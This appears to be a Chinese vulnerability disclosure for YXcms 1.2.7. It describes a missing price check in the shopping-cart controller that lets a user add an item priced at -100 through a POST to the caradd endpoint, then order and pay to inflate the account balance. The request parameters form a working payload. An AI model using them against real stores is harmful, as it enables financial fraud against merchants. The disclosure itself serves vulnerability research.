### 简要描述:
YXcms1.2.7 刷账户预存款余额
### 详细说明:
问题存在于protested/apps/member/controller/shopcarController.php
只判断了数目不能为负,但没有判断价格不能为负。
[<img src="https://images.seebug.org/upload/201503/19135255bcd72ec0384c704f15b4500c94294932.jpg" alt="yxcms5.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19135255bcd72ec0384c704f15b4500c94294932.jpg)
访问链接http://127.0.0.1/YXcmsApp1.2.7/index.php?r=member/shopcar/caradd
post:
'code' => int 1
'name' => int 1
'price' => float -100
'num' => int 1
就向购物车里塞了一个负数价格的商品。
[<img src="https://images.seebug.org/upload/201503/19135327b455bd1f82fd4c950869f5bb8608cf6f.jpg" alt="yxcms6.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19135327b455bd1f82fd4c950869f5bb8608cf6f.jpg)
生成订单然后支付,就可以刷余额了。
[<img src="https://images.seebug.org/upload/201503/19135337369873877c426bbbe85c172b4deb254e.jpg" alt="yxcms7.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19135337369873877c426bbbe85c172b4deb254e.jpg)
PS:这个的余额的标示形式比较奇怪,但并不影响我们用刷来的余额来买东西。
### 漏洞证明:
如上
京公网安备 11010502034610号
暂无评论